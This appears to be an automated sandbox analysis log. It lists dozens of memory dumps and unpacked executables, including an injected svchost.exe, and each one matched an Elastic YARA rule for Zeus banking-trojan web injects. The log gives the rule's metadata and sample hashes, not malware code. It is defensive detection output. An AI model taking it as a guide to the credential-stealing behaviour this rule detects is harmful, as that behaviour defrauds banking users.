Source: 31.2.NcYLgtXIKJgHj.exe.27f0000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.47.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.42.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.NcYLgtXIKJgHj.exe.1740000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.61.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000006.00000002.2562028304.0000000001740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000007.00000002.2554723271.0000000002FA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2644113860.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2710293683.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2651597551.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2640221225.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2551297845.000000000ED00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2491630816.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2681109856.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000014.00000002.2584784821.00000000027D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001F.00000002.2699028400.0000000002790000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2136779480.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2688837088.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2681703821.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2682799870.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2646845259.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000016.00000002.2606518078.00000000005E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2693850041.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2694477664.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2610885248.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2667661376.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001F.00000002.2699100650.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2711656555.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000A.00000002.2576688656.0000000001520000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2689917423.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000000.00000003.2123232589.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2689093667.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2642349690.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000010.00000002.2538477716.0000000002A60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000019.00000002.2629072397.0000000002B90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000016.00000002.2610943205.0000000002340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.3391913803.0000000002CD1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000E.00000002.2558937111.0000000002920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
